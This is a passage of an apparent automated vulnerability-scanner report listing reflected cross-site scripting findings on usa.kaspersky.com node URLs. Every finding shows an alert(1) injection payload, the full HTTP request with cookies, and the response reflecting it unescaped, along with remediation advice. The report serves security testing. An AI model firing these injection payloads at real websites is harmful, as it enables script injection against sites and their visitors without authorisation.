<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/nodec38c2"><script>alert(1)</script>1f8e4638aba/5750" />
...[SNIP]...

1.154. http://usa.kaspersky.com/node/5750 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5750

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91dea"-alert(1)-"f4c14aa40cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node91dea"-alert(1)-"f4c14aa40cf/5750 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:45:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687142"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:45:50 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node91dea"-alert(1)-"f4c14aa40cf/5750";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.155. http://usa.kaspersky.com/node/5750 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5750

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 819e7"><script>alert(1)</script>14ed47e28fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5750819e7"><script>alert(1)</script>14ed47e28fb HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:47:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687242"
Content-Type: text/html; charset=utf-8
Content-Length: 29338
Date: Sat, 18 Dec 2010 15:47:29 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5750819e7"><script>alert(1)</script>14ed47e28fb" />
...[SNIP]...

1.156. http://usa.kaspersky.com/node/5750 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5750

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 304f2"-alert(1)-"59b1b95390c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/5750304f2"-alert(1)-"59b1b95390c HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:48:00 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687280"
Content-Type: text/html; charset=utf-8
Content-Length: 30005
Date: Sat, 18 Dec 2010 15:48:08 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/5750304f2"-alert(1)-"59b1b95390c";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.157. http://usa.kaspersky.com/node/5751 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5751

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a7f7"><script>alert(1)</script>ca56f8691bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node2a7f7"><script>alert(1)</script>ca56f8691bb/5751 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:45:11 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687111"
Content-Type: text/html; charset=utf-8
Content-Length: 30103
Date: Sat, 18 Dec 2010 15:45:17 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node2a7f7"><script>alert(1)</script>ca56f8691bb/5751" />
...[SNIP]...

1.158. http://usa.kaspersky.com/node/5751 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5751

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f148"-alert(1)-"72c75039ed7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node6f148"-alert(1)-"72c75039ed7/5751 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:45:28 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687128"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:45:35 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node6f148"-alert(1)-"72c75039ed7/5751";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.159. http://usa.kaspersky.com/node/5751 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5751

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e514d"><script>alert(1)</script>1213ca831e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/5751e514d"><script>alert(1)</script>1213ca831e2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:46:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687213"
Content-Type: text/html; charset=utf-8
Content-Length: 29338
Date: Sat, 18 Dec 2010 15:47:00 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/5751e514d"><script>alert(1)</script>1213ca831e2" />
...[SNIP]...

1.160. http://usa.kaspersky.com/node/5751 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5751

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50c13"-alert(1)-"fea47316e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/575150c13"-alert(1)-"fea47316e7 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:47:28 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687248"
Content-Type: text/html; charset=utf-8
Content-Length: 30000
Date: Sat, 18 Dec 2010 15:47:37 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/575150c13"-alert(1)-"fea47316e7";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.161. http://usa.kaspersky.com/node/5752 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5752

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee36a"-alert(1)-"de1a66b5413 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nodeee36a"-alert(1)-"de1a66b5413/5752 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:46:37 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687197"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:46:43 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/nodeee36a"-alert(1)-"de1a66b5413/5752";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.162. http://usa.kaspersky.com/node/5752 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5752

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2611"><script>alert(1)</script>be7bc84f8dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nodef2611"><script>alert(1)</script>be7bc84f8dc/5752 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:46:14 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687174"
Content-Type: text/html; charset=utf-8
Content-Length: 30103
Date: Sat, 18 Dec 2010 15:46:24 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/nodef2611"><script>alert(1)</script>be7bc84f8dc/5752" />
...[SNIP]...

1.163. http://usa.kaspersky.com/node/5752 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5752

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ce60"><script>alert(1)</script>b7a0dce8b2b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node/57526ce60"><script>alert(1)</script>b7a0dce8b2b HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:48:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687322"
Content-Type: text/html; charset=utf-8
Content-Length: 29338
Date: Sat, 18 Dec 2010 15:48:51 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node/57526ce60"><script>alert(1)</script>b7a0dce8b2b" />
...[SNIP]...

1.164. http://usa.kaspersky.com/node/5752 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5752

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95cec"-alert(1)-"aca99bcd8b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /node/575295cec"-alert(1)-"aca99bcd8b1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:49:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687349"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:49:17 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/node/575295cec"-alert(1)-"aca99bcd8b1";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.165. http://usa.kaspersky.com/node/5756 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5756

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b84d"><script>alert(1)</script>65f910010dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /node5b84d"><script>alert(1)</script>65f910010dc/5756 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:08:38 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292684918"
Content-Type: text/html; charset=utf-8
Content-Length: 30103
Date: Sat, 18 Dec 2010 15:08:57 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/node5b84d"><script>alert(1)</script>65f910010dc/5756" />
...[SNIP]...

1.166. http://usa.kaspersky.com/node/5756 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5756

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb9a3"-alert(1)-"d0412cb35d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nodeeb9a3"-alert(1)-"d0412cb35d2/5756 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:09:14 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292684954"
Content-Type: text/html; charset=utf-8
Content-Length: 30006
Date: Sat, 18 Dec 2010 15:09:21 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/nodeeb9a3"-alert(1)-"d0412cb35d2/5756";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.167. http://usa.kaspersky.com/node/5756 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /node/5756

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8bcc"-alert(1)-"eb8c35454a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

